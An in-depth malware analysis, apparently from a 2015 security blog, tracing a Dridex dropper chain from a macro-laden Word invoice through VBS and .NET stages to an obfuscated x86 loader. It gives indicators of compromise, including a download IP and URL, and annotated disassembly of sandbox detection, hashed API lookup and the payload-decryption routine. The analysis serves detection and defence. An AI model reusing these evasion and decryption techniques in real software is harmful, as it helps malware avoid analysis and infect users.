In-depth analysis of a dropper of Dridex malware
A French version is available here. For other languages, you can translate this page with Google Translate.
June 18, 2015, 01:30. Last modified on June 24, 2015 01:29 (modifications log)
In-depth analysis of a Dridex malware dropper
A major spam campaign started on June 8, 2015 in France to distribute the malware known as Dridex. Below is a detailed analysis of how one of its droppers works.
Note: several different droppers are currently used in successive spam campaigns to distribute Dridex. The dropper analyzed here was received on June 8, 2015.
Contents
- Overview of the operation of Dridex dropper studied
- Step 1 - Word Document received via spam campaign : download of an intermediate Dridex dropper
- Step 2 - VBS Script downloaded: download of Dridex dropper
- Step 3 - intermediate .net Executable : decryption of a second .net assembly
- Step 4 - second .net Assembly: decrypting an x86 dropper
- Step 5 - x86 dropper : deciphering and launching the payload (botnet 120)
- Digression on obfuscation methods used
- "linear" or "flow-oriented" disassembler
- Unnecessary instructions
- Sandbox detection and elegant management of callback function
- Total obfuscation of Windows API calls
- Modifying data via the stack
- Back to the subject of the dropper
- So what ? Download final Dridex payload DLL !
- Appendices
Overview of the dropper operations
The sequence of the workstation compromise is as follows:
- the user receives an email inviting them to open the attachment, presented as an unpaid invoice;
- the user opens the attached document, which triggers the VBA macro embedded in the Word document;
- the VBA macro downloads a file hosted on pastebin containing VBS code, then executes that code;
- the VBS code downloads a .net executable from the server 212.76.130.99, then launches it;
- the executable contains C# code and an abnormally large resource. The C# code recombines the contents of a number of data tables to rebuild a second .net assembly, then loads and executes it;
- the code of the second assembly allocates a memory area, copies a data table of about 3 KB into it and executes it; this data is x86 machine code;
- the dropper thus launched, heavily obfuscated (no cleartext strings, no visible imports or API calls), locates the payload stored in the downloaded .net executable, decrypts and decompresses it, then executes it;
- the payload (which will prove to be "botnet 120") only has to establish persistence on the system and carry out its malicious activity;
- botnet 120 contacts its C&C and downloads the final Dridex payload DLL!
Note that steps 3 and 4 are specific to Dridex botnet 120 (thanks to Techhelplist); some other Dridex droppers skip them.
The rest of this page details these steps and explains the obfuscation methods used, including those of the x86 dropper, with the aim of improving detection and blocking the infection process.
Step 1 - Word Document received via spam campaign : download of an intermediate Dridex dropper
As is often the case, the first step of the infection is the opening of a document attached to an email. Here it is a Word document purporting to show the user an invoice, which actually contains VBA code whose purpose is to download the intermediate dropper.
In the case studied here, the received Word document has the following characteristics:
Characteristics of Word document received by email | |
---|---|
Origin | Received by email |
Name | 2209_0C8D8115C2D2.doc |
Size | 22 834 bytes |
Date | 06/08/2015 11:43:00 |
MD5 | 666B2121CFB7871CD1354B08D51A36E4 |
SHA256 | 62E3CF46F3C805E99913C718A1A32076F9EECC9206CAC45B080F2268064632E0 |
VirusTotal | |
malwr |
The VBA code runs when the Word document is opened. It is padded with many useless wait routines and some classic VB obfuscation techniques (splitting and reversing strings, for example). The original macro code is available here.
Once "de-obfuscated", the code is as follows:
The macro therefore downloads a VBS file from the Pastebin service, then executes it.
Step 2 - VBS Script downloaded: download of Dridex dropper
The code of the downloaded VBS file is fairly short. Its characteristics are the following:
Characteristics of the VBS file downloaded | |
---|---|
Origin | Downloaded from http://pastebin.com/download.php?i=1YzPHtum |
Name | hGYdsf.vbs |
Size | 3 491 bytes |
Date | 06/08/2015 12:20:56 |
MD5 | 70EE4226E623FBCE3E82D56E1A531F08 |
SHA256 | AA5E877FC346FA948794CAF90672D00F99109D64CD9050B95E1ECD72776B9312 |
VirusTotal (26/57 on the 06/14/2015) | |
malwr |
The code is obfuscated with conventional string substitutions and chr(xxx) concatenations, nothing of particular interest.
Once de-obfuscated, the code is as follows:
The intermediate dropper:
- downloads an executable from an HTTP server and stores it in the temporary directory of the host as "tryewdgh.exe";
- launches the executable;
- downloads an image from the savepic.ru service, probably to signal that a new machine is being compromised;
- waits for the launched executable;
- downloads another image from the savepic.ru service, probably to signal that the compromise is well under way.
The interesting point here is the two savepic.ru calls, which let the operator of the spam campaign track the progress of the compromise.
Step 3 - intermediate .net Executable : decryption of a second .net assembly
The .net downloaded executable has the following characteristics :
Characteristics of the .net downloaded executable | |
---|---|
Origin | Downloaded from http://212.76.130.99/bt/bt/get5.php |
Name | tryewdgh.exe |
Size | 235 240 bytes |
Date | 06/08/2015 12:21:00 |
MD5 | AB619931EBF56EE0137548F18209F38B |
SHA256 | C1E879EA756603D66A27C74D8297B78582D808DE48D4E02608F3E57193542122 |
VirusTotal (37/57 on the 06/14/2015) | |
malwr | also known as "crypted.120.exe" |
The executable contains several resources and types :
The size of one of the resources is surprisingly large:
Regarding the code, only the KampongFlabby class is interesting. It contains more than 300 methods, the vast majority of which are of no interest except as a way to fool antivirus engines by generating many different executables on the fly.
Most methods return a value or modify a parameter they receive. They often contain valid code, but wrapped in if() statements whose condition is always false. Example:
The only interesting and actually used methods are ExploitsForearms(), HatchetsDramatists(), IslamFrugality(), �L~() (the entry point) and MarshalledLiverworks().
Note: the GlitteringGlistened() method contains no code. It probably only serves to muddy the waters, as some decompilers fail on it.
The entry point simply calls KampongFlabby.ExploitsForearms(), which contains almost all of the intermediate dropper code.
The obfuscated code is available here. Once cleaned, the code is as follows :
As can be seen from the source, the ExploitsForearms() method:
- creates several data arrays, some of them very large, containing a scrambled .net assembly;
- combines all of them into a single array;
- calls the HatchetsDramatists() method with the array, its size, a permutation key and an unused parameter as arguments; HatchetsDramatists() takes care of reordering the bytes;
- loads the resulting assembly and launches it.
The cleaned HatchetsDramatists() method is as follows:
This method is interesting because of the way the key is modified at each permutation.
With the new .NET assembly launched, we can move on to the next step...
Step 4 - second .net Assembly: decrypting an x86 dropper
The intermediate assembly (available here) is of no particular interest. It contains a data block of about 3 KB that it loads into memory and runs; this data is a piece of x86 code. The intermediate assembly can be summed up by the following code:
So, we can go directly to the next step...
Step 5 - x86 dropper : deciphering and launching the payload
The code is available here: Dridex x86 dropper disassembled, and the binary here: Dridex x86 dropper (binary). A disassembled and commented listing is also available here.
In this part we look at what the dropper does and detail its anti-disassembly and sandbox detection methods.
Digression on obfuscation methods used
This code is interesting for several reasons. It exhibits a number of techniques that make it fairly resistant to static analysis:
- consumption of a CALL return address as the callback parameter of an enumeration API;
- immoderate use of JMP to mislead disassemblers operating in "linear" mode;
- total obfuscation of the imports used;
- modification of variables by pushing them and altering them directly on the stack;
- scattering of useless instructions to complicate reading and understanding of the code.
"linear" or "flow-oriented" disassembler
As a preliminary, an illustration of the use of JMP to mislead disassemblers operating in linear mode (linear sweep). Consider the following code as disassembled by IDA, which works in "flow" mode (recursive traversal):
seg000:000002FE C7 45 F8 00 00 00+ mov [ebp+var_8], 0
seg000:00000305 46 inc esi
seg000:00000306 8D 45 F8 lea eax, [ebp+var_8]
seg000:00000309 11 DE adc esi, ebx
seg000:0000030B EB 03 jmp short loc_310
seg000:0000030D BC db 0BCh ; +
seg000:0000030E EA db 0EAh ; Û
seg000:0000030F AB db 0ABh ; ½
seg000:00000310 loc_310:
seg000:00000310 50 push eax
seg000:00000311 47 inc edi
seg000:00000312 E8 1F 00 00 00 call sub_336
What are the three bytes at 0x30D-0x30F for? They make the code harder to read for disassemblers that work in linear mode. For example, OllyDbg decodes the same sequence as follows:
seg000:000002FE C7 45 F8 00 00 00+ mov [ebp+var_8], 0
seg000:00000305 46 inc esi
seg000:00000306 8D 45 F8 lea eax, [ebp+var_8]
seg000:00000309 11 DE adc esi, ebx
seg000:0000030B EB 03 jmp short 000000310
seg000:0000030D BC EA AB 50 47 mov esp, 4750ABEA
seg000:00000312 E8 1F 00 00 00 call sub_336
Note that with a linear disassembly you get a JMP whose destination lies in the middle of a MOV instruction! In linear mode the disassembler decodes instructions one after another, so after the two bytes of the JMP it interprets the following bytes as MOV ESP, 4750ABEA, wrongly.
A flow-oriented disassembler records the destination of the JMP and resumes disassembly there. It therefore correctly decodes the sequence PUSH EAX / INC EDI at 0x310 and treats the bytes at 0x30D-0x30F as data, since no code path reaches them.
The remaining difficulty for the reader of the code is to decide whether this data is meaningful or not... In this case it is not.
In the rest of this article, these JMPs and the skipped junk bytes are removed from the listings to improve readability.
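To make the difference concrete, here is an added example (my own code, not part of the original article): a toy decoder in C that knows only the opcodes of the fragment above and runs over its bytes twice, once in linear sweep and once in recursive traversal (the "flow" mode). The byte string and the addresses are copied from the IDA listing; the decoder, its opcode table and the function names are assumptions of the example, not anything from the dropper or from IDA.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bytes of the fragment at 0x2FE-0x316, copied from the IDA listing above. */
#define BASE 0x2FEu
static const uint8_t CODE[] = {
    0xC7, 0x45, 0xF8, 0x00, 0x00, 0x00, 0x00, /* 2FE: mov dword ptr [ebp-8], 0 */
    0x46,                                     /* 305: inc esi */
    0x8D, 0x45, 0xF8,                         /* 306: lea eax, [ebp-8] */
    0x11, 0xDE,                               /* 309: adc esi, ebx */
    0xEB, 0x03,                               /* 30B: jmp short 0x310 */
    0xBC, 0xEA, 0xAB,                         /* 30D: three bytes never executed */
    0x50,                                     /* 310: push eax */
    0x47,                                     /* 311: inc edi */
    0xE8, 0x1F, 0x00, 0x00, 0x00,             /* 312: call 0x336 */
};
#define CODE_END (BASE + (uint32_t)sizeof CODE)

enum { FLOW_NEXT, FLOW_JMP, FLOW_CALL };
typedef struct { uint32_t addr, target; int len, kind; char text[40]; } insn_t;

static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Decode one instruction at addr. Only the opcodes of the fragment are known; anything else
 * (or running off the end of the blob) is reported as undecodable. */
static int decode(uint32_t addr, insn_t *in) {
    if (addr < BASE || addr >= CODE_END) return 0;
    const uint8_t *p = CODE + (addr - BASE);
    uint32_t rem = CODE_END - addr;
    in->addr = addr; in->len = 0; in->kind = FLOW_NEXT; in->target = 0;
    switch (p[0]) {
    case 0xC7: if (rem < 7 || p[1] != 0x45) return 0;   /* mov dword ptr [ebp+disp8], imm32 */
        in->len = 7; snprintf(in->text, sizeof in->text, "mov dword ptr [ebp%+d], 0x%X", (int8_t)p[2], (unsigned)le32(p + 3)); return 1;
    case 0x46: in->len = 1; strcpy(in->text, "inc esi"); return 1;
    case 0x47: in->len = 1; strcpy(in->text, "inc edi"); return 1;
    case 0x50: in->len = 1; strcpy(in->text, "push eax"); return 1;
    case 0x8D: if (rem < 3 || p[1] != 0x45) return 0;   /* lea eax, [ebp+disp8] */
        in->len = 3; snprintf(in->text, sizeof in->text, "lea eax, [ebp%+d]", (int8_t)p[2]); return 1;
    case 0x11: if (rem < 2 || p[1] != 0xDE) return 0;   /* adc esi, ebx */
        in->len = 2; strcpy(in->text, "adc esi, ebx"); return 1;
    case 0xEB: if (rem < 2) return 0;                    /* jmp rel8: no fall-through edge */
        in->len = 2; in->kind = FLOW_JMP; in->target = addr + 2 + (uint32_t)(int8_t)p[1];
        snprintf(in->text, sizeof in->text, "jmp short 0x%X", (unsigned)in->target); return 1;
    case 0xBC: if (rem < 5) return 0;                    /* mov esp, imm32 (the bogus decode) */
        in->len = 5; snprintf(in->text, sizeof in->text, "mov esp, 0x%X", (unsigned)le32(p + 1)); return 1;
    case 0xE8: if (rem < 5) return 0;                    /* call rel32: target and fall-through */
        in->len = 5; in->kind = FLOW_CALL; in->target = addr + 5 + le32(p + 1);
        snprintf(in->text, sizeof in->text, "call 0x%X", (unsigned)in->target); return 1;
    default: return 0;
    }
}

/* Linear sweep: decode the next instruction wherever the previous one ended. */
static int linear_sweep(insn_t *out, int max) {
    int n = 0; uint32_t a = BASE;
    while (n < max && decode(a, &out[n])) { a += (uint32_t)out[n].len; n++; }
    return n;
}

/* Recursive traversal: only follow control-flow edges; bytes never reached stay undecoded. */
static int recursive_traversal(insn_t *out, int max) {
    uint32_t work[16]; int top = 0, n = 0;
    uint8_t seen[sizeof CODE] = {0};
    work[top++] = BASE;
    while (top > 0 && n < max) {
        uint32_t a = work[--top];
        if (a < BASE || a >= CODE_END || seen[a - BASE]) continue; /* outside the blob (0x336) or done */
        if (!decode(a, &out[n])) continue;
        insn_t *in = &out[n++];
        for (int i = 0; i < in->len; i++) seen[a - BASE + (uint32_t)i] = 1;
        if (in->kind != FLOW_JMP) work[top++] = a + (uint32_t)in->len;  /* fall-through edge */
        if (in->kind != FLOW_NEXT) work[top++] = in->target;            /* jump/call edge */
    }
    return n;
}

static const insn_t *find_insn(const insn_t *list, int n, uint32_t addr) {
    for (int i = 0; i < n; i++) if (list[i].addr == addr) return &list[i];
    return NULL;
}
/* Text of the instruction that starts exactly at addr, or NULL if none does. */
static const char *find_text(const insn_t *list, int n, uint32_t addr) {
    const insn_t *in = find_insn(list, n, addr);
    return in ? in->text : NULL;
}
/* 1 if addr lies inside a decoded instruction; an uncovered byte is what IDA shows as "db". */
static int covered(const insn_t *list, int n, uint32_t addr) {
    for (int i = 0; i < n; i++)
        if (addr >= list[i].addr && addr < list[i].addr + (uint32_t)list[i].len) return 1;
    return 0;
}

static void print_listing(const insn_t *list, int n) {
    for (uint32_t a = BASE; a < CODE_END; ) {
        const insn_t *in = find_insn(list, n, a);
        if (in) { printf("  %04X  %s\n", (unsigned)a, in->text); a += (uint32_t)in->len; }
        else    { printf("  %04X  db 0x%02X\n", (unsigned)a, CODE[a - BASE]); a++; }
    }
}

int main(void) {
    insn_t lin[16], rec[16];
    int nl = linear_sweep(lin, 16), nr = recursive_traversal(rec, 16);
    puts("linear sweep:");         print_listing(lin, nl);
    puts("recursive traversal:");  print_listing(rec, nr);
    return 0;
}
```

The linear pass swallows the three junk bytes plus PUSH EAX / INC EDI into a single bogus MOV ESP, 4750ABEA and resynchronises only at the CALL; the flow pass lands on 0x310 through the JMP edge and leaves 0x30D-0x30F uncovered, which is exactly the db lines in the IDA output above.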
Unnecessary instructions
Before returning to what the dropper does, a second digression, on the useless instructions inserted to complicate understanding of the code. Consider the following code:
seg000:00000276 nextDword:
seg000:00000276 31 C1 xor ecx, eax
seg000:00000278 83 FB 00 cmp ebx, 0
seg000:0000027B 74 6A jz short loc_2E7 ; ======> No more bytes to decipher...
seg000:0000027D 0F AF FF imul edi, edi
seg000:00000280 8B 06 mov eax, [esi] ; Take 4 bytes from the source...
seg000:00000282 49 dec ecx
seg000:00000283 33 45 10 xor eax, [ebp+key] ; ...decipher them...
seg000:00000286 0F AF FE imul edi, esi
seg000:00000289 89 06 mov [esi], eax ; ...and write them back into the buffer!
seg000:0000028B 09 4D DC or [ebp+var_24], ecx
seg000:0000028E FF 75 10 push [ebp+key] ; Pushes the key on the stack
seg000:00000291 89 F2 mov edx, esi
seg000:00000293 C1 04 24 04 rol [esp+30h+var_30], 4 ; Rotate the key 4 bits left...
seg000:00000297 C7 45 E0 FD 00 00+ mov [ebp+var_20], 0FDh
seg000:0000029E C1 04 24 02 rol [esp+30h+var_30], 2 ; ...2 more bits...
seg000:000002A2 6B FF 0B imul edi, 0Bh
seg000:000002A8 D1 04 24 rol [esp+30h+var_30], 1 ; ...and one more bit!
seg000:000002AB F7 DF neg edi
seg000:000002AD 8D 4D 0C lea ecx, [ebp+bufferSize]
seg000:000002B0 8B 09 mov ecx, [ecx] ; ECX = buffer size
seg000:000002B2 29 0C 24 sub [esp+30h+var_30], ecx ; Key = key - bufferSize
seg000:000002B5 83 DA 17 sbb edx, 17h
seg000:000002B8 81 2C 24 8A 3F 61+ sub [esp+30h+var_30], 49613F8Ah ; Key = key - 0x49613F8A
seg000:000002BF 4A dec edx
seg000:000002C4 81 2C 24 48 C3 34+ sub [esp+30h+var_30], 34C348h ; Key = key - 0x34C348
seg000:000002CB 1B 7D F8 sbb edi, [ebp+var_8]
seg000:000002D2 8F 45 10 pop [ebp+key] ; Pops the key, modified directly on the stack
seg000:000002D5 29 D8 sub eax, ebx
seg000:000002D7 4B dec ebx
seg000:000002D8 8B 45 DC mov eax, [ebp+var_24]
seg000:000002DF 46 inc esi
seg000:000002E0 F7 DA neg edx
seg000:000002E5 EB 8F jmp short nextDword
seg000:000002E7 loc_2E7:
seg000:000002E7 89 75 F0 mov [ebp+var_10], esi
seg000:000002EF 5E pop esi
seg000:000002F0 5B pop ebx
seg000:000002F1 C9 leave
seg000:000002F2 C2 0C 00 retn 0Ch
We can see that the registers EDI and EDX are repeatedly modified but their content is never used, and they are not used by the caller either. One can also see at 0x2D5 that the SUB EAX, EBX instruction is useless, since it is immediately followed by MOV EAX, [EBP+var_24], which overwrites EAX!
The dropper code is riddled with useless instructions, which greatly complicates reading and understanding it.
Sandbox detection and elegant management of callback function
The first action of the dropper is to count the windows on the system with the EnumWindows(WNDENUMPROC lpEnumFunc, LPARAM lParam) function, probably to detect execution inside a sandbox. EnumWindows() takes two parameters: a pointer to a callback function and an LPARAM value handed through to that callback. The callback is called by EnumWindows() for each top-level window on the system.
The sandbox detection function uses a fun trick: it prepares the lParam to pass to EnumWindows (a pointer to a window counter), then does a CALL (see blue) to a piece of code that calls EnumWindows(). Since nothing other than lParam was pushed, the return address pushed by the CALL is consumed from the stack by EnumWindows(), which interprets it as the address of the callback function!
The callback code (see green) is therefore located in the middle of the sandbox detection function, and IDA is completely lost: it cannot tell that the code at 0x317 is a callback, and on seeing a CALL it creates a sub_336, wrongly ending the detectSandbox function and losing track of the stack.
seg000:000002F5 ; ***************************************************************************************
seg000:000002F5 ; * detectSandbox (to be confirmed) ? *
seg000:000002F5 ; ***************************************************************************************
seg000:000002F5 ; * DESCRIPTION : this function counts the windows in the system and returns 1 if the *
seg000:000002F5 ; * number of windows is 15h, 1Ch, 7 or 6, else it returns 0. *
seg000:000002F5 ; ***************************************************************************************
seg000:000002F5
seg000:000002F5 detectSandbox proc near
seg000:000002F5 var_8 = dword ptr -8
seg000:000002F5 var_4 = dword ptr -4
seg000:000002F5 arg_0 = dword ptr 8
seg000:000002F5 arg_4 = dword ptr 0Ch
seg000:000002F5 55 push ebp
seg000:000002F6 89 E5 mov ebp, esp
seg000:000002F8 83 EC 34 sub esp, 34h
seg000:000002FE C7 45 F8 00 00 00+ mov [ebp+var_8], 0
seg000:00000306 8D 45 F8 lea eax, [ebp+var_8] ; [ebp+var_8] is the window counter
seg000:00000310 50 push eax ; EAX points to [ebp+var_8] => lParam for the coming call to EnumWindows()
seg000:00000312 E8 1F 00 00 00 call sub_336
seg000:00000317 ; We never return here: only one parameter was pushed before calling a piece of code
seg000:00000317 ; that calls EnumWindows(), which consumes two. The return address pushed by the CALL
seg000:00000317 ; is used as the EnumWindows callback function.
seg000:00000317 ; =======================================================================================
seg000:00000317 ; ---------------------------------------------------------------------------------------
seg000:00000317 ; Entry point of the EnumWindows callback function, called from sub_336
seg000:00000317 ;
seg000:00000317 ; BOOL CALLBACK EnumWindowsProc ( _In_ HWND hwnd, _In_ LPARAM lParam );
seg000:00000317 ;
seg000:00000317 ; This callback counts the windows in the system.
seg000:00000317 19 CA sbb edx, ecx ; dummy instruction, not removed so that there is something at 0x317
seg000:00000319 8B 44 24 08 mov eax, [esp+arg_0] ; EAX = lParam = pointer to the window counter
seg000:00000324 FF 00 inc dword ptr [eax] ; Increment the window counter
seg000:0000032B B8 01 00 00 00 mov eax, 1 ; Return 1 to continue the enumeration
seg000:00000331 C2 08 00 retn 8
seg000:00000336 ; ---------------------------------------------------------------------------------------
seg000:00000336 ; =======================================================================================
seg000:00000336 ; This is not really a subroutine. IDA has been fooled by the EnumWindows
seg000:00000336 ; callback function hidden inside sub_2F5
seg000:00000336 sub_336 proc near
seg000:00000336 68 21 5E 53 7C push 7C535E21h ; 'User32.dll' hash
seg000:0000033B E8 D9 FC FF FF call getModuleHandle
seg000:00000340 68 CA 16 5D 38 push 385D16CAh ; 'EnumWindows' hash
seg000:00000345 50 push eax
seg000:00000346 E8 BD FD FF FF call getAPIAddress
seg000:0000034B FF D0 call eax ; Call to EnumWindows ( WNDENUMPROC lpEnumFunc, LPARAM lParam );
seg000:0000034D ; Back from EnumWindows(): [EBP-8] holds the number of windows enumerated.
seg000:0000034D ; Some sandboxes apparently have only a few windows to enumerate, because
seg000:0000034D ; if there are exactly 15h, 1Ch, 7 or 6 windows, we terminate here!
seg000:0000034F 83 7D F8 15 cmp dword ptr [ebp-8], 15h ; [EBP-8] is the window counter (value = 0x5A in my XP VM)
seg000:00000353 74 2A jz short loc_37F
seg000:0000035B 83 7D F8 1C cmp dword ptr [ebp-8], 1Ch
seg000:0000035F 74 1E jz short loc_37F
seg000:00000363 83 7D F8 07 cmp dword ptr [ebp-8], 7
seg000:00000367 74 16 jz short loc_37F
seg000:0000036F 83 7D F8 06 cmp dword ptr [ebp-8], 6
seg000:00000373 74 0A jz short loc_37F
seg000:0000037A EB 0E jmp short loc_38A
seg000:0000037F loc_37F: ; ...
seg000:00000381 B8 01 00 00 00 mov eax, 1 ; Return 1 ==> the process will be terminated!
seg000:00000388 C9 leave
seg000:00000389 C3 retn ; ===> We land at 0x3B1, the return address of the caller of detectSandbox!
seg000:0000038A loc_38A: ; ...
seg000:0000038D 31 C0 xor eax, eax ; Return 0 => we live on...
seg000:00000391 C9 leave
seg000:00000392 C3 retn ; ===> We land at 0x3B1, the return address of the caller of detectSandbox!
seg000:00000392 sub_336 endp
Total obfuscation of Windows API calls
You may have noticed, from 0x336 to 0x346, the unusual way Windows APIs are invoked.
Here's another example to retrieve the handle of the current application :
seg000:000003C6 ; Stacking the API parameters
seg000:000003C6 6A 00 push 0 ; NULL => retrieve the handle of the current module
seg000:000003CF ; Retrieving the DLL handle
seg000:000003CF 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' hash
seg000:000003D4 E8 40 FC FF FF call getModuleHandle ; Retrieve the Kernel32.dll handle in EAX
seg000:000003D9 ; Retrieving the API function address
seg000:000003D9 68 FD 49 87 C6 push 0C68749FDh ; 'GetModuleHandleW' hash
seg000:000003DE 50 push eax ; Push the Kernel32.dll handle for the getAPIAddress call
seg000:000003DF E8 24 FD FF FF call getAPIAddress ; Retrieve the GetModuleHandleW() entry point in EAX
seg000:000003E4 ; Calling the API function
seg000:000003E4 FF D0 call eax ; GetModuleHandleW( NULL );
The dropper uses a total obfuscation scheme built on:
- a module-handle lookup function based on a hash of the module name;
- an export lookup function that finds a function address from a hash of the function name.
Each time the dropper needs to call a Windows API, it pushes the parameters for the API (here PUSH 0, to get the handle of the current module), then pushes the hash of the name of the DLL exporting the desired API and calls the DLL-handle lookup function. It then pushes the hash of the desired function name together with the DLL handle and calls the API-address lookup function. Finally it calls the Windows API through the address returned in EAX.
The export lookup function (named getAPIAddress here) is classic: it parses the export table of the DLL module in memory, hashing each exported name and comparing it with the desired hash.
The DLL-handle lookup function walks the process's loaded-module list through the PEB and PEB_LDR_DATA and returns the module whose name hash matches the one requested.
A practical consequence for detection: the hashes are immediate operands in the code (7C535E21h for User32.dll, 385D16CAh for EnumWindows, 0F3BB9845h for Kernel32.dll, 0C68749FDh for GetModuleHandleW), so they are fixed constants that a static signature for this dropper can match on, even though no import name or cleartext string is present.
Modifying data via the stack
A last trick that complicates reading the code: in the decryption routine for the compressed executable hidden in the resources, the dropper uses sequences such as PUSH DWORD PTR SS:[EBP+10h], then modifies the DWORD at the top of the stack (for example ROL [ESP], 4), then POP DWORD PTR SS:[EBP+10h].
An inattentive reader will not notice that the pushed value was modified before being popped, since within one block of code PUSH and POP are normally used precisely to preserve the pushed value!
An illustration of this technique can be seen further down this page in the decryption routine named bufferDecipher (see here), at offsets 0x28E, 0x293, 0x29E, 0x2A8, 0x2B2, 0x2B8, 0x2C4 and 0x2D2.
Back to the subject of the dropper
After this digression, back to what the dropper does. Its main job is to decrypt and decompress a new executable hidden in a resource of the .net executable that was launched, then run it.
The way the encrypted data is located is rather unusual:
- the dropper first retrieves the path of the running file, opens it, reads its size, allocates a memory area and reloads the whole file into it (see the code from 0x3CF to 0x580);
- it then rebuilds a 20-byte buffer in memory with the following routine:
seg000:00000581 B8 56 CD D3 A0 mov eax, 0A0D3CD56h
seg000:0000058A B9 05 00 00 00 mov ecx, 5
seg000:00000596 8D 7D C4 lea edi, [ebp-3Ch] ; EDI points to EBP-3Ch
seg000:000005A0 loc_5A0:
seg000:000005A0 4A dec edx
seg000:000005A1 89 C2 mov edx, eax ; EDX = EAX (0xA0D3CD56 on the first pass)
seg000:000005A6 C1 C2 07 rol edx, 7 ; ROL EDX, 7
seg000:000005AB 01 D0 add eax, edx ; EAX = EAX + EDX
seg000:000005AD F7 DE neg esi
seg000:000005AF AB stosd ; EAX -> [ES:EDI], EDI += 4
seg000:000005B3 49 dec ecx
seg000:000005B4 75 EA jnz short loc_5A0
After this loop, the buffer at [EBP-3Ch] contains:
A6 78 BA 0A AB CB F6 67 5E A1 5C 63 8F 50 AD 11 17 98 55 E8
- and its structure turns out to be the following:
struct dridexDropperSignature {              // Value
    unsigned int signature;                  // 0x0ABA78A6
    unsigned int signature2;                 // 0x67F6CBAB
    unsigned int compressedModuleSizeKey;    // 0x635CA15E, used to decipher the compressed module size
    unsigned int uncompressedModuleSizeKey;  // 0x11AD508F, used to decipher the uncompressed module size
    unsigned int decipheringKey;             // 0xE8559817, used to decipher the buffer deciphering key
};
- the dropper scans the executable reloaded in memory from the end, looking for the 4-byte pattern signature. Once found, it checks that the next 4 bytes are identical to signature2; it has then found the start of the data block of interest;
- it then uses the DWORD compressedModuleSizeKey to decipher, with a simple XOR, the next 4 bytes, which contain the size of the compressed data; it thus knows how much data to decipher and then decompress;
- it does the same with the DWORD uncompressedModuleSizeKey to decipher, with the same simple XOR, the next 4 bytes, which contain the size of the uncompressed data;
- finally, it applies the same procedure to recover the decryption key contained in the next 4 bytes;
- armed with this information, the dropper can decrypt the data with the following function (blue code deciphers the data, red code permutes the key):
seg000:0000024E bufferDecipher proc near
seg000:0000024E var_30 = dword ptr -30h
seg000:0000024E var_24 = dword ptr -24h
seg000:0000024E var_20 = dword ptr -20h
seg000:0000024E var_1C = dword ptr -1Ch
seg000:0000024E var_10 = dword ptr -10h
seg000:0000024E var_8 = dword ptr -8
seg000:0000024E lpBuffer = dword ptr 8
seg000:0000024E bufferSize = byte ptr 0Ch
seg000:0000024E key = dword ptr 10h
seg000:0000024E 55 push ebp ; bufferSize = 0xB070
seg000:0000024E ; key = 0xA0D3CD56
seg000:0000024F 89 E5 mov ebp, esp
seg000:00000251 83 EC 24 sub esp, 24h
seg000:00000254 53 push ebx
seg000:00000255 56 push esi
seg000:00000259 8D 45 0C lea eax, [ebp+bufferSize]
seg000:0000025C FF 30 push dword ptr [eax] ; Pushes the buffer size...
seg000:0000025E 87 7D F0 xchg edi, [ebp+var_10]
seg000:00000261 5B pop ebx ; ...and pops it into EBX!
seg000:00000268 83 EB 03 sub ebx, 3 ; EBX = bufferSize - 3 = number of loop iterations
seg000:0000026B 87 CA xchg ecx, edx
seg000:00000270 8B 75 08 mov esi, [ebp+lpBuffer]
seg000:00000276 nextDword:
seg000:00000276 31 C1 xor ecx, eax
seg000:00000278 83 FB 00 cmp ebx, 0
seg000:0000027B 74 6A jz short loc_2E7 ; ======> No more bytes to decipher...
seg000:00000280 8B 06 mov eax, [esi] ; Take 4 bytes from the source...
seg000:00000282 49 dec ecx
seg000:00000283 33 45 10 xor eax, [ebp+key] ; ...decipher them...
seg000:00000289 89 06 mov [esi], eax ; ...and write them back into the buffer!
seg000:0000028B 09 4D DC or [ebp+var_24], ecx
seg000:0000028E FF 75 10 push [ebp+key] ; Pushes the key on the stack
seg000:00000293 C1 04 24 04 rol [esp+30h+var_30], 4 ; Rotate the key 4 bits left...
seg000:0000029E C1 04 24 02 rol [esp+30h+var_30], 2 ; ...2 more bits...
seg000:000002A8 D1 04 24 rol [esp+30h+var_30], 1 ; ...and one more bit!
seg000:000002AD 8D 4D 0C lea ecx, [ebp+bufferSize]
seg000:000002B0 8B 09 mov ecx, [ecx] ; ECX = buffer size
seg000:000002B2 29 0C 24 sub [esp+30h+var_30], ecx ; Key = key - bufferSize
seg000:000002B8 81 2C 24 8A 3F 61+ sub [esp+30h+var_30], 49613F8Ah ; Key = key - 0x49613F8A
seg000:000002C4 81 2C 24 48 C3 34+ sub [esp+30h+var_30], 34C348h ; Key = key - 0x34C348
seg000:000002D2 8F 45 10 pop [ebp+key] ; Pops the key, modified directly on the stack
seg000:000002D7 4B dec ebx
seg000:000002D8 8B 45 DC mov eax, [ebp+var_24]
seg000:000002DF 46 inc esi ; ESI advances by ONE byte: each 4-byte XOR overlaps the previous one by 3 bytes
seg000:000002E5 EB 8F jmp short nextDword
seg000:000002E7 loc_2E7: ; ...
seg000:000002E7 89 75 F0 mov [ebp+var_10], esi
seg000:000002EF 5E pop esi
seg000:000002F0 5B pop ebx
seg000:000002F1 C9 leave
seg000:000002F2 C2 0C 00 retn 0Ch
seg000:000002F2 bufferDecipher endp
The decryption algorithm in C is as follows:
- once the data is decrypted, the dropper allocates a memory area of the uncompressed size and calls RtlDecompressBuffer() to decompress the buffer; the allocated area then holds a new PE executable, almost ready to run.
Executable characteristics:
Deciphered and decompressed payload characteristics | |
---|---|
Origin | Deciphered and decompressed by the dropper, from the resource section |
Name | NA |
Size | 64 000 bytes |
Date | NA |
MD5 | 7AC7416FCAB7745F9000EA3E281C8318 |
SHA256 | BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D |
VirusTotal (26/57 on the 06/14/2015) | |
malwr | |
- ...the dropper then only has to create a new process, inject the executable into it and run it!
